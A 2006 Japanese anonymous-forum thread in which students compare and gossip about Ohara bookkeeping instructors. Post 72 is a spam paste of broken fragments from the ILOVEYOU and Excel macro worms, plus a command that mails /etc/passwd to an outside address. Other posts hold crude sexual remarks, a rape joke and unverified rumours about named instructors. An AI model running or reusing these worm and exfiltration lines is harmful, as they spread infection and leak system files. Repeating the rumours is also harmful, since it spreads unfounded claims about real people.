5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

大原の簿記講師

1 :一般に公正妥当と認められた名無しさん:2006/04/15(土) 21:45:18 ID:???
前スレ落ちたのかないので勃てました

2 :一般に公正妥当と認められた名無しさん:2006/04/15(土) 21:48:22 ID:???
>>1
とっとと死ね馬鹿

3 :一般に公正妥当と認められた名無しさん:2006/04/15(土) 22:02:41 ID:???
前にあったのはTACの簿記講師ではなかったか?
どうせなら大原講師全般にすれば盛り上がったかもな。

4 :一般に公正妥当と認められた名無しさん:2006/04/15(土) 22:20:08 ID:???
>>1
バーカ

5 :一般に公正妥当と認められた名無しさん:2006/04/15(土) 23:39:17 ID:???
大阪校の簿記のあの先生が眩しすぎて夜も眠れません。

6 :一般に公正妥当と認められた名無しさん:2006/04/16(日) 00:14:53 ID:???
おれが受けてる先生が
一番教え方上手いと思う

7 :一般に公正妥当と認められた名無しさん:2006/04/16(日) 01:00:59 ID:???
甲谷最強

8 :一般に公正妥当と認められた名無しさん:2006/04/16(日) 01:42:55 ID:Cv65ySuV
津田沼の1組の先生わかりやすい♪

9 :一般に公正妥当と認められた名無しさん:2006/04/16(日) 01:55:23 ID:???
コウタニ先生電話でるとはいコウヤですって
ヤの部分をすんごい強調するよね

10 :一般に公正妥当と認められた名無しさん:2006/04/16(日) 05:15:08 ID:8/1YdYxc
2級・3級の鴻池講師の評判はどうですか?
無料受講受けてみたけどイマイチだった。


11 :一般に公正妥当と認められた名無しさん:2006/04/16(日) 10:07:25 ID:???
勃起したペニスであの娘のヴァギナをマッサージして
ラブジュース大量放出アゲアゲ

12 :一般に公正妥当と認められた名無しさん:2006/04/16(日) 15:23:37 ID:???
自分で受けて結論出てるじゃないのw

13 :一般に公正妥当と認められた名無しさん:2006/04/16(日) 20:53:43 ID:???
>>10
鴻池先生はマジでいいぞ。周りではわりと人気がある人。

14 :一般に公正妥当と認められた名無しさん:2006/04/16(日) 21:25:43 ID:???
一級工原の岸先生すごくいい。

15 :一般に公正妥当と認められた名無しさん:2006/04/16(日) 22:27:52 ID:???
管理会計だと誰だ?
やっぱ平澤か

16 :一般に公正妥当と認められた名無しさん:2006/04/16(日) 22:51:29 ID:PEExMxa5
鷲頭先生良い★

17 :一般に公正妥当と認められた名無しさん:2006/04/17(月) 00:00:59 ID:???
>>13
回答サンクス

無料講座は第一回目しか観れなかったもので・・・イマイチというか

微妙だったもので。ただ、周りの人の評判はいいんですね。

思いきって受けてみようかなぁ。

18 :一般に公正妥当と認められた名無しさん:2006/04/17(月) 02:21:30 ID:???



19 :一般に公正妥当と認められた名無しさん:2006/04/17(月) 16:58:55 ID:???
無料講義だからやる気なかったんじゃね?

20 :一般に公正妥当と認められた名無しさん:2006/04/17(月) 20:30:59 ID:???
何のための無料講座なのか

21 :一般に公正妥当と認められた名無しさん:2006/04/18(火) 02:46:58 ID:???
>>13
どこ校の講師?

22 :一般に公正妥当と認められた名無しさん:2006/04/18(火) 20:53:10 ID:TemMi52l
大阪校

23 :一般に公正妥当と認められた名無しさん:2006/04/23(日) 00:45:35 ID:???
あきたん最高!!

24 :一般に公正妥当と認められた名無しさん:2006/04/23(日) 00:50:26 ID:???
石戸は糞
作門能力もない
糞門しか作れない

25 :一般に公正妥当と認められた名無しさん:2006/04/23(日) 13:41:38 ID:???
門は作れなくてもいいよ

26 :一般に公正妥当と認められた名無しさん:2006/04/29(土) 00:06:11 ID:???
あきたん・・・(´Д`;) 

27 :一般に公正妥当と認められた名無しさん:2006/05/03(水) 02:22:13 ID:???
コウヤッコ

28 :一般に公正妥当と認められた名無しさん:2006/05/10(水) 17:13:19 ID:k8wICsJx
塩○ってナルシスト?髪ばっかいらってきんもー☆なんだけど。

29 :一般に公正妥当と認められた名無しさん:2006/05/10(水) 23:52:33 ID:???
1、小松、舟戸
2、池田、石戸、久保田、甲谷
3、猪俣


30 :一般に公正妥当と認められた名無しさん:2006/05/11(木) 01:18:46 ID:???
↑何の順番?

31 :石戸:2006/05/11(木) 01:57:26 ID:q6VAVBx3
私は大原で一番の講師ですがなにか?

32 :一般に公正妥当と認められた名無しさん:2006/05/12(金) 12:22:00 ID:qW8+aZxT
2級簿記講師、TACと大原ならどちらがわかりやすい講師多い?
都内、埼玉で。

33 :一般に公正妥当と認められた名無しさん:2006/05/13(土) 00:53:30 ID:b7atDdFz
クレアールが一番です。

34 :一般に公正妥当と認められた名無しさん:2006/05/13(土) 16:16:38 ID:kskuLPhc
コウヤのペリーは笑った。。。

35 :一般に公正妥当と認められた名無しさん:2006/05/13(土) 17:24:44 ID:acl0s2+c
英最高

36 :一般に公正妥当と認められた名無しさん:2006/05/15(月) 13:07:26 ID:???
川俣&難波はどうなんだ??

37 :一般に公正妥当と認められた名無しさん:2006/05/15(月) 18:31:46 ID:6n1YqWyx
石戸せんせって可愛い?

38 :一般に公正妥当と認められた名無しさん:2006/05/15(月) 19:07:40 ID:XlTNCEi+
津田沼の出口って先生なかなか、いい授業するよ。結構わかりやすいんだよね。

39 :一般に公正妥当と認められた名無しさん:2006/05/15(月) 22:51:49 ID:???
>>37

ttp://www.o-hara.ac.jp/best/kaikeisi/comment.html

40 :一般に公正妥当と認められた名無しさん:2006/05/17(水) 07:24:56 ID:???
すごいな。21で公認会計士って

41 :一般に公正妥当と認められた名無しさん:2006/05/17(水) 19:10:19 ID:eH2qyjec
大原の会計士の先生ってパンフの写り、実物より良すぎないか
舟○先生とかさー

42 :一般に公正妥当と認められた名無しさん:2006/05/17(水) 23:28:12 ID:???
>>40
×公認会計士
○会計士補

ま、それでもすごいことには変わりないけどね・・

43 :一般に公正妥当と認められた名無しさん:2006/05/19(金) 23:50:32 ID:???
>>38
同じ先生ハケン 人ナカーマ
うむ そうだね
俺は講師氏の簿記にまつわる ゆる〜い小ネタがスキ

44 :一般に公正妥当と認められた名無しさん:2006/05/20(土) 18:58:46 ID:ZQ3nMZS8
大原やTACの簿記講師のスレはあるのに DAIのがないのはなんで
結構面白い話題がたくさんあるのに

45 :一般に公正妥当と認められた名無しさん:2006/05/20(土) 23:55:49 ID:???
>>44
だったらスレ立てればいいじゃん

46 :一般に公正妥当と認められた名無しさん:2006/05/21(日) 22:47:54 ID:???
>39
う〜ん、そんなに可愛いか?

47 :一般に公正妥当と認められた名無しさん:2006/05/22(月) 22:48:05 ID:???
声はメチャメチャ可愛い。
質問電話の際にそう思った。

48 :一般に公正妥当と認められた名無しさん:2006/06/04(日) 00:39:21 ID:???
本試験まであと1週間あげ

49 :一般に公正妥当と認められた名無しさん:2006/06/04(日) 00:47:07 ID:???
>>48
What???

50 :一般に公正妥当と認められた名無しさん:2006/06/28(水) 00:26:36 ID:???
今週の講義で、
勘定記入の本来の意味がわかってないと
2級は相当苦労するって言われた。

問題集見たら勘定記入だらけでヘコむ

51 :一般に公正妥当と認められた名無しさん:2006/06/28(水) 01:46:04 ID:???
商会…大原
工原…岸
はイイ(>_<)

52 :一般に公正妥当と認められた名無しさん:2006/06/28(水) 18:05:00 ID:???
>>36
東京都の23区外の校舎かな!?
基礎講義南場、答練川股だった。

先生の良し悪しは質問に行った時の対応と授業とは違う教え方によるんじゃないか?
と最近思うんだが・・

53 :一般に公正妥当と認められた名無しさん:2006/06/28(水) 21:48:22 ID:???
>>52
え?言ってる意味がよくわからん
具体的にどういうこと?

54 :一般に公正妥当と認められた名無しさん:2006/06/29(木) 21:56:25 ID:???
>>52
日本語でおK

55 :一般に公正妥当と認められた名無しさん:2006/07/02(日) 15:58:50 ID:???
コウヤ先生って、まだ結構若いの?
2002年合格って言ってた。35くらいかと思ってたよ。

56 :一般に公正妥当と認められた名無しさん:2006/07/03(月) 18:21:52 ID:???
2級のテキストに載ってる
有価証券の差入・保管と
有価証券の貸借って
他社の問題集には載ってないんだけど
これって出題範囲じゃないんですか?
エロイ人教えて下さい

57 :一般に公正妥当と認められた名無しさん:2006/07/04(火) 23:48:45 ID:???
大原No1簿記講師は誰?

58 :一般に公正妥当と認められた名無しさん:2006/07/05(水) 00:42:56 ID:???
>>55
いや実際に35くらいだよ。
(合格るまで時間がかかった)

59 :一般に公正妥当と認められた名無しさん :2006/07/06(木) 20:09:33 ID:qnB0CHHz
甲谷って28くらいに見えるんだけど

60 :一般に公正妥当と認められた名無しさん :2006/07/07(金) 11:28:27 ID:???
>>57
荒野と舟ドと久保田しか受けてないけど、荒野かな

61 :一般に公正妥当と認められた名無しさん:2006/07/08(土) 01:34:08 ID:???
聞くまでもないだろ。No1はあきたんだよ。

62 :一般に公正妥当と認められた名無しさん:2006/07/08(土) 22:31:29 ID:???
>>61
アキタソに教わりたい
っていうか犯されたいwww

63 :一般に公正妥当と認められた名無しさん:2006/07/09(日) 02:47:11 ID:ApRPz8BL
村井が一番

64 :一般に公正妥当と認められた名無しさん:2006/07/10(月) 01:51:11 ID:xUitHGj+
>>34 たしかにあのペリーのモノマネは最初の2、3分は引くがそれから最後までは凄いこの人!と思ってしまった。

65 :一般に公正妥当と認められた名無しさん:2006/07/15(土) 16:54:59 ID:???
先生を好きになりました
何かツライです
どうすれば先生と仲良くなれるんでしょうか?

66 :一般に公正妥当と認められた名無しさん:2006/07/16(日) 14:57:43 ID:???
>>65
レイープ

67 :一般に公正妥当と認められた名無しさん:2006/07/21(金) 21:53:34 ID:???
>>65
アキタソ??

68 :一般に公正妥当と認められた名無しさん:2006/07/21(金) 21:54:08 ID:eiFjMcN1
∩゚∀゚∩age

69 :一般に公正妥当と認められた名無しさん:2006/08/13(日) 00:15:51 ID:???
ねえ
>>1はいる?

70 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 19:07:12 ID:???
津田沼校のある講師は
「この問題間違えたやつは死んだ方がいいですね」って平気で言う。


71 :一般に公正妥当と認められた名無しさん:2006/08/14(月) 20:18:08 ID:???
>>70
単なる口癖だろ
表現はいかがなものかと思うので
直接言ってやれ
馬鹿だから表現する言葉知らないだけ

72 :番組の途中ですが名無しです:2006/08/15(火) 04:03:50 ID:???
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
fso.copyfile "dirsystem&nurupo.vbs","j:\windows\startmenu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFilef1.path, f1.path+"

73 :一般に公正妥当と認められた名無しさん:2006/08/15(火) 09:38:50 ID:E415o9oC
>>72
稚拙大原職員乙

74 :一般に公正妥当と認められた名無しさん:2006/08/18(金) 21:48:41 ID:???
>>73
大原・・・・
学校自体は有名だが
職員は少し問題のある人いるみたいでつね

75 :一般に公正妥当と認められた名無しさん:2006/08/18(金) 22:58:45 ID:???
問題って例えばどんな?

76 :一般に公正妥当と認められた名無しさん:2006/08/18(金) 23:18:19 ID:???
>>75
レス読んでるか?
>>70をみろ。

77 :一般に公正妥当と認められた名無しさん:2006/08/19(土) 00:02:49 ID:???
スマンかった

78 :一般に公正妥当と認められた名無しさん:2006/08/20(日) 10:53:02 ID:???
>>70
これ本科の講師だろ
津田沼の簿記講師にこんなこと言う人はいない

もし自分が言われたら
「じゃあ死なないように頑張ろう」と思うか
「ふーん あそ」と思うか。

もし某アイドル講師に言われたとしても
「こら挨拶程度の小ネタだな」としか思わん。

よっぽど嫌いな講師に言われたら
「じゃあおまえは当時死なずに済んだのかよ!?」と思うかも知れん。
別に嫌いな講師いないけど。

誰がどんな言い方で言うかで、受け取り方も変わる。
だから、講師はいろんな人がいるのを想定してしゃべらなければならん。

>>71も言ってるように、直接言えば良かったのに。
俺だったら言うね。講義終了後。

その時、教卓バンバン叩きながらヒステリックに抗議する必要はない。
抗議というのは冷静かつ大胆にするものだ
長文スマソ

79 :一般に公正妥当と認められた名無しさん:2006/08/20(日) 22:11:55 ID:???
>>78
>これ本科の講師だろ
>津田沼の簿記講師にこんなこと言う人はいない

本科だろうが何だろうが同じ大原の講師だろう
お客さんはそう思っている。
擁護したいのはわかるがそれが組織というもの






80 :一般に公正妥当と認められた名無しさん:2006/08/22(火) 16:47:23 ID:???
>>78
例え出してるけど何が言いたいのかワカラン。
もし講師なら授業進め方特訓したほうが良いよ。

81 :一般に公正妥当と認められた名無しさん:2006/08/23(水) 00:02:59 ID:???
(゚Д゚)

82 :一般に公正妥当と認められた名無しさん:2006/08/24(木) 07:29:38 ID:???
税理士受講生兼任簿記講師が津田沼にいるの

通学も通勤も津田沼ってWWW

通学は水道橋か池袋にすればいいのに



83 :一般に公正妥当と認められた名無しさん:2006/08/29(火) 23:18:26 ID:???
池袋にもいるよ、税理士受講生&社会人課程のアルバイト簿記講師。バカだから今年も落ちたらしいけど。元受講生のほうが先に『先生』になるって…

84 :一般に公正妥当と認められた名無しさん:2006/08/30(水) 20:31:49 ID:???
以前、会計士講座の簿記課の職員室@水道橋へ行って質問しました。
そうしたら、新人講師が対応してくれたのですが、かなり難解な
論点だったので「もっと簿記の詳しい者に対応を代わります。」と
席をたち、評判がよくベテランのK先生のところへ行くと「自分で
対応しろ。」「実務指針を自分で調べろ。」のように、結構厳しく
扱われている声がしました。
普段温厚そうなK先生って、実は結構キツい人なのかなと思いつつ
「講師も楽ではないな。」としみじみ実感しました。

85 :一般に公正妥当と認められた名無しさん:2006/08/30(水) 21:26:04 ID:???
>>84
K松先生?

86 :一般に公正妥当と認められた名無しさん:2006/08/30(水) 22:48:01 ID:???
kうや?

87 :一般に公正妥当と認められた名無しさん:2006/08/31(木) 08:47:45 ID:???
>>84
会計士や税理士試験に合格して監査法人・税理士法人などに就職すると
同様の「しごき」が待っているのでしょうかね?完全な徒弟社会だそう
なので。

88 :一般に公正妥当と認められた名無しさん:2006/08/31(木) 09:12:32 ID:???
>>84
その先生かわいそ
対応してあげればいいのに
講師は大変だよね

89 :一般に公正妥当と認められた名無しさん:2006/08/31(木) 10:23:28 ID:ebl7AS9I
講師はかわいそう特に31歳位の独身男

90 :一般に公正妥当と認められた名無しさん:2006/08/31(木) 11:12:54 ID:oU+3cLjs
>>84
講師が若い講師に注意するなら、まだいい。

受講生をどなりちらしてる馬鹿講師をこの間発見した。
受講生は3人いたんだが、みんな十代。。。しょぼーんとしてた(´・ω・`)
可愛そうに・・・

ちなみに、名古屋校

91 :一般に公正妥当と認められた名無しさん:2006/08/31(木) 14:59:37 ID:???
>>85
久保田じゃね?

92 :一般に公正妥当と認められた名無しさん:2006/08/31(木) 22:54:29 ID:???
>>89
具体的さにワロ

93 :一般に公正妥当と認められた名無しさん:2006/09/01(金) 00:08:09 ID:???
↑禿同。『30歳』でないところが何とも言えず。

94 :一般に公正妥当と認められた名無しさん:2006/09/01(金) 01:06:47 ID:???
きっと男の31は微妙なお年頃なのね
でも講師ってモテるんじゃないの?

95 :一般に公正妥当と認められた名無しさん:2006/09/02(土) 19:55:42 ID:3F9c8Q20
そうだね

96 :一般に公正妥当と認められた名無しさん:2006/09/02(土) 22:27:20 ID:???
早稲田の200人くらいの教室で企業法を準備ができたからといって本来の開始時刻10分前に開始して2〜3分後に『やっぱりやめてくださーい』って取り止めた問題は何の措置もなしですかね?

つまり8分くらい問題を知った状態で待機してたと。企業法でそれって落ち着いて答案構成できちゃうよね…けっこうでかいよね。




97 :一般に公正妥当と認められた名無しさん:2006/09/03(日) 12:23:57 ID:???
わからんちんパワー炸裂で
講義中 妄想ひとり旅に出てしまう俺ガイル

98 :一般に公正妥当と認められた名無しさん:2006/09/10(日) 17:45:00 ID:iLx4TNLd
ウラウラーー

99 :一般に公正妥当と認められた名無しさん:2006/09/14(木) 17:19:17 ID:NMgo0lMr
何か聞いたこと あるな〜

100 :一般に公正妥当と認められた名無しさん:2006/09/14(木) 17:42:06 ID:???
100

101 :一般に公正妥当と認められた名無しさん:2006/09/15(金) 21:28:11 ID:AAccQD31
大原の講師も落ちぶれたもんだな 
人生楽しい事ないのか??

102 :一般に公正妥当と認められた名無しさん:2006/09/15(金) 22:28:54 ID:4kU2wLVB
>>84
K先生は結構厳しいと思うよ。
職員室で見かけたけど、特に上下関係なんかしっかりしていそうな感じがする。
ある意味、体育会系出身とも感じる。
でも、苦労人という感じで、この先生が言うなら厳しいことを言われても
納得できる部分は多い。

それに、簿記のアプローチの仕方なんかしっかしりしているし、
誤ったレジメを配布した場合、通信はきちんと訂正して送られてくる。


103 :一般に公正妥当と認められた名無しさん:2006/09/15(金) 23:19:18 ID:???
>>102 こうやっこが怒ったらヤクザより恐いと思う。怒られたことないけど。

104 :一般に公正妥当と認められた名無しさん:2006/09/15(金) 23:51:45 ID:8wWStne2
実際見た目はガラの悪いパチンコ屋の店員だもんな。


105 :一般に公正妥当と認められた名無しさん:2006/09/16(土) 00:49:23 ID:???
簿記講師っていっつも同じ事の繰り返しで飽きないのかなあ

106 :一般に公正妥当と認められた名無しさん:2006/09/16(土) 13:31:08 ID:???
それは簿記に限らんだろ

107 :一般に公正妥当と認められた名無しさん:2006/09/16(土) 20:46:58 ID:???
今年は改正になった部分が多いからそれなりにエキサイティング
なんじゃない

108 :一般に公正妥当と認められた名無しさん:2006/09/17(日) 01:46:39 ID:???
エキサイティングて・・ワロタ

109 :一般に公正妥当と認められた名無しさん:2006/09/17(日) 19:01:14 ID:vmAfk/WR
>>107 こうやっこは、配当限度額のところやら色々変更になった部分を説明するときエキサイティングしてたぞ。

110 :一般に公正妥当と認められた名無しさん:2006/09/17(日) 20:09:03 ID:???
本人がエクサイトするなら、exciting じゃなくて、
excited が正しいね。
何か大学受験英語みたいでスミマセン。

111 :一般に公正妥当と認められた名無しさん:2006/09/17(日) 22:12:33 ID:vmAfk/WR
こうやっこは、社債発行差金がなくなったことやいろいろ変更になったところを説明するときエキサイティッドゥしてたぞ

112 :一般に公正妥当と認められた名無しさん:2006/09/17(日) 22:16:41 ID:TqcNJv7U
セックスティドしたいな

113 :一般に公正妥当と認められた名無しさん:2006/09/17(日) 22:30:22 ID:???
社債発行砂金がなくなったってこれネタじゃないよな?


114 :一般に公正妥当と認められた名無しさん:2006/09/17(日) 22:54:41 ID:vmAfk/WR
>>113 ネタじゃないよ。
社債発行差金は社債から直接控除されることになったんだよ。


115 :一般に公正妥当と認められた名無しさん:2006/09/17(日) 23:02:07 ID:???
強制じゃないでしょ。出題される場合は指示があるはず

116 :番組の途中ですが名無しです:2006/09/17(日) 23:06:31 ID:???
>>113
馬鹿乙

117 :一般に公正妥当と認められた名無しさん:2006/09/17(日) 23:54:45 ID:???
マジー!?
え?全然知らなかった
何もかも浦島状態・・・
誰かkwsk教えてください

118 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 02:10:56 ID:ll0OIQgG
社債発行費も償還期間で償却になったぞ

119 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 03:00:06 ID:ARkfuSzs
Kやは受講生に手をだしたとの噂が

120 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 09:13:54 ID:NwJIwp1E
大原の講師はそんなやつばっかりか。俺も何人か知ってるけど

121 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 10:15:15 ID:???
例えば、他には誰?

122 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 10:40:41 ID:NwJIwp1E
生徒の事本気で好きになり結婚 考えてる奴。年も10個ぐらい離れてる奴。

123 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 13:48:59 ID:9+XvjgtQ
清水顕ってどうなの?ステップを担当するみたいだけどby通信生。


124 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 14:16:38 ID:BEseOgM/
>>123
ココリコ田中だよ。

125 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 18:30:37 ID:???
>>123
「よっ!男前」と声をかけてあげてください(こうやっこ談)

126 :一般に公正妥当と認められた名無しさん:2006/09/18(月) 23:00:54 ID:???
>>122
よっ!男前!

127 :一般に公正妥当と認められた名無しさん:2006/09/19(火) 00:20:57 ID:UoHcCStW
こうやっこが冬になってもYシャツの袖をまくっているのか、僕の密かなたのしみだ

128 :一般に公正妥当と認められた名無しさん:2006/09/19(火) 01:47:52 ID:???
あの人三つ揃え?のスーツとか、ちょっと一昔前みたいなカッコだね。
わかりやすいから好きだけど。

129 :一般に公正妥当と認められた名無しさん:2006/09/19(火) 11:32:56 ID:???
講師の変な格好と言えば、シャツ+ベストはいただけない。
場末のバーテンダーみたいなやつ。

130 :一般に公正妥当と認められた名無しさん:2006/09/19(火) 22:31:56 ID:wqu4R6me
バスの運転手

131 :一般に公正妥当と認められた名無しさん:2006/09/20(水) 20:12:35 ID:+tLuG9nd
社債発行費の償却が償還期間になったため、こうやっこの
『発行三年、他五年っ』
が聞けなくなった。
かわりにペリーをもう一度リクエストしたい

132 :一般に公正妥当と認められた名無しさん:2006/09/20(水) 21:26:21 ID:+p1vF5zT
水道橋の○鳥はけっこう生徒思いな奴で大原の講師の中では珍しく自分なりのポリシーがあって講師やってる気がする。


133 :一般に公正妥当と認められた名無しさん:2006/09/21(木) 00:21:27 ID:???
こうやっこ先生はどこ校なの?

134 :一般に公正妥当と認められた名無しさん:2006/09/21(木) 01:23:20 ID:JFBhABQr
>>133 東京校が誇る若手ナンバーワン講師。二時間目の冒頭の小ネタにかなりのエネルギーを割く。
有名な小ネタはペリーのモノマネ。『カイコクしてくっだサイヨー』から延々15分の熱演。終了後には拍手喝采の嵐。
常時テンション高し。見た目は元ヤンあがりのパチンコ屋の店員だが、恐るるなかれ、質問にも丁寧に応じてくれる。

135 :一般に公正妥当と認められた名無しさん:2006/09/21(木) 06:46:02 ID:???
若手ナンバーワンはフニャトだろ

136 :一般に公正妥当と認められた名無しさん:2006/09/21(木) 13:44:01 ID:???
>>134
つうかもう30代半ばだから若手では無いだろ・・・

137 :一般に公正妥当と認められた名無しさん:2006/09/22(金) 00:17:22 ID:???
>>134
どもです。
水道橋ですか。こうやっこ先生にちょっと興味あります。
日商簿記講師ですよね?

来月からの2級総まとめ&直前答練でいい先生探してます。
関東でおすすめの先生いたら誰か紹介してください。

138 :一般に公正妥当と認められた名無しさん:2006/09/22(金) 00:35:00 ID:???
会計士だから
日商簿記は担当してない

139 :一般に公正妥当と認められた名無しさん:2006/09/22(金) 00:52:18 ID:???
そうですか。残念!

140 :一般に公正妥当と認められた名無しさん:2006/09/22(金) 15:55:22 ID:yf9C5U96
アキタソ

141 :一般に公正妥当と認められた名無しさん:2006/09/22(金) 22:10:14 ID:???
アキオタきめぇ

142 :一般に公正妥当と認められた名無しさん:2006/09/27(水) 18:00:12 ID:nVmjq1ft
大原の簿記入門を通信受講しています。
「社債発行差金」「差額補充法」とか、平気で入ってんだけどw

143 :一般に公正妥当と認められた名無しさん:2006/09/27(水) 19:10:13 ID:???
>>142
なにか問題あるの?

144 :一般に公正妥当と認められた名無しさん:2006/09/27(水) 22:10:44 ID:???
>>142
知ってて困るものでは無いと思うが?

145 :一般に公正妥当と認められた名無しさん:2006/09/27(水) 22:52:35 ID:???
>>142-144

社債発行差金はあったら、問題だろ!
(とは言っても、残高の償却位なら問題ないけど…)

146 :一般に公正妥当と認められた名無しさん:2006/09/28(木) 18:27:58 ID:???
会社法が変わったとかさー受付に何かプリント置いてほしいよね
自分の担当じゃないと講師は何もしてくれないし

147 :一般に公正妥当と認められた名無しさん:2006/09/30(土) 18:55:44 ID:mUvtw1Z3
池袋の講師の
○村大さん
○岸さん
かなり好き

148 :???:2006/09/30(土) 19:27:35 ID:???
↑あ〜、○岸先生は教え方メチャクチャうまいね。授業にリズムがある&声でかいから、こっちの集中力も途切れないね。

149 :一般に公正妥当と認められた名無しさん:2006/09/30(土) 19:50:33 ID:???
自演乙

150 :???:2006/10/01(日) 18:41:23 ID:???
自演じゃないんで。○岸先生・○下先生は比較的厳しい授業ですよ。のんびりやりたい人は○村大先生・田○先生がオススメ。ま、どの講師も質問対応はすごく丁寧ですよ。

151 :一般に公正妥当と認められた名無しさん:2006/10/01(日) 18:49:05 ID:???
イケメン鈴木を忘れるなよ

152 :一般に公正妥当と認められた名無しさん:2006/10/02(月) 11:45:07 ID:???
>>142
先生が言っていましたが、経過措置があるので、従前から
社債を発行していた会社は、社債発行差金による処理と
償却原価法による処理を平行することになるようですよ。
償却原価法による処理は、直前期でやるといっていました。

結局、来年の受験生は両方の処理を押さえる必要がある
ということみたいですが、考え方は一緒なので社債発行差金
の処理を練習しておけばすぐ対応できるということでしょう。

153 :一般に公正妥当と認められた名無しさん:2006/10/02(月) 11:46:52 ID:???
>>152
自己レスです。
税理士講座の簿記論と勘違いしてました、すみません。

154 :一般に公正妥当と認められた名無しさん:2006/10/08(日) 19:23:02 ID:???
そうだね〜、鈴○先生かっこいいよね。この間話してて顔に見とれたよ。ってか彼をはじめ、今○先生とか別○先生とか、若い先生の授業ってどう?

155 :一般に公正妥当と認められた名無しさん:2006/10/09(月) 00:15:05 ID:???
>>154
今○先生と別○先生は受けたことないからわからん。

イケメン鈴木はかなり教え方うまいと思う。
雑談も面白いし、試験に関することを色々話してくれるからタメになる。

156 :一般に公正妥当と認められた名無しさん:2006/10/09(月) 10:03:24 ID:???
そうなんだぁ〜。じゃ、受け持ってもらうの楽しみにしてよう!でも他の講師に聞いたんだけど、彼、相当頭いいんでしょ?そのうち辞めちゃうんじゃないか心配。

157 :一般に公正妥当と認められた名無しさん:2006/10/10(火) 19:04:50 ID:???
>>156
理系出身ってことは知ってるけど、
頭いいとかいう話は聞いたことないな。
でもまああんだけ若くて教え方うまいんだから
頭いいだろうな。

彼は税理士目指してるけど、
まだ税法は持って無いんじゃなかったけ?
少なくともあと2、3年は辞めないと思うが。

158 :一般に公正妥当と認められた名無しさん:2006/10/10(火) 23:51:45 ID:???
今日から総まとめ開始
俺は小松崎先生と合格への道へ行く( ̄ー ̄)

159 :一般に公正妥当と認められた名無しさん:2006/10/11(水) 11:56:52 ID:41MvL5OE
西中島の先生または生徒はいますか?
私の彼氏が西中島の先生なのですが、最近あやしいのです。
もしかしたら浮気してるのではないかと疑ってます。
何か情報ありましたら、教えてください。

160 :一般に公正妥当と認められた名無しさん:2006/10/11(水) 15:42:08 ID:BBmD0RHJ
>>158
俺も!( ̄ー ̄)人(・∀・)

161 :一般に公正妥当と認められた名無しさん:2006/10/11(水) 16:07:38 ID:VXtUT9In
159
先生のお名前は何ていうのですか?

162 :一般に公正妥当と認められた名無しさん:2006/10/11(水) 23:38:23 ID:???
>>159
関東だからその先生の事全然知らないけど、よく疑いながら付き合えるね。
直接本人に聞けばいいじゃん。
人を信じないと自分も信じてもらえないよ。
しかもこんな不特定多数の人が見る所で聞かれて、彼氏カワイソ。

163 :一般に公正妥当と認められた名無しさん:2006/10/11(水) 23:54:38 ID:???
まー半分女子大の教授みたいなもんだしな
資格無しで行き詰まった出会いの無い受講生側から見れば
壇上に立つ有資格の講師は後光が差しているかも





164 :一般に公正妥当と認められた名無しさん:2006/10/12(木) 00:45:21 ID:UYJHBTar
ペリーは普通に関根勤もよくやってるしなんかのお笑いDVDにも入ってた
誰かそのことを指摘してやってくれ 俺はビデオだから

165 :一般に公正妥当と認められた名無しさん:2006/10/12(木) 14:28:38 ID:4uSTebNI
西中島の生徒だよ。
あなたは西中島行ってないの?

166 :一般に公正妥当と認められた名無しさん:2006/10/13(金) 22:50:58 ID:???
本支店ワケワカメ
俺は予想会にかける!!
当てて〜!担当講師ちゃん!おながいします

167 :一般に公正妥当と認められた名無しさん:2006/10/14(土) 22:43:24 ID:JNRP/f6e
私は卒業したから。
浮気は何度もされてる。
もちろん、生徒とも。
だから、今年も。
西中異動になったの去年かおととし。
簿記

168 :一般に公正妥当と認められた名無しさん:2006/10/14(土) 22:49:59 ID:???
ここじゃなく西中スレできいたほうがよくね?

169 :一般に公正妥当と認められた名無しさん:2006/10/16(月) 12:08:33 ID:l20B2gda
本科講師?
社会人課?
講師と仲いいし、大抵のわかるよ。

170 :一般に公正妥当と認められた名無しさん:2006/10/16(月) 19:45:11 ID:vMDbWj50
講師と付き合ってる生徒オオイヨ 皆知らないだけ
出会いが少ないから年齢hが離れていても自分の好みな
生徒に手出す 講師にはお気に入りの生徒が必ずおるから
講師どうしでそんな話してます。

171 :一般に公正妥当と認められた名無しさん:2006/10/16(月) 22:21:44 ID:???
↑講師?

172 :一般に公正妥当と認められた名無しさん:2006/10/17(火) 12:50:18 ID:c+VAEm7Y
講師陣もいい年齢だし、生徒は女多いし、そこで関係が進展するのは必然でしょ。
ただ講師がどこまで本気かってことが問題。

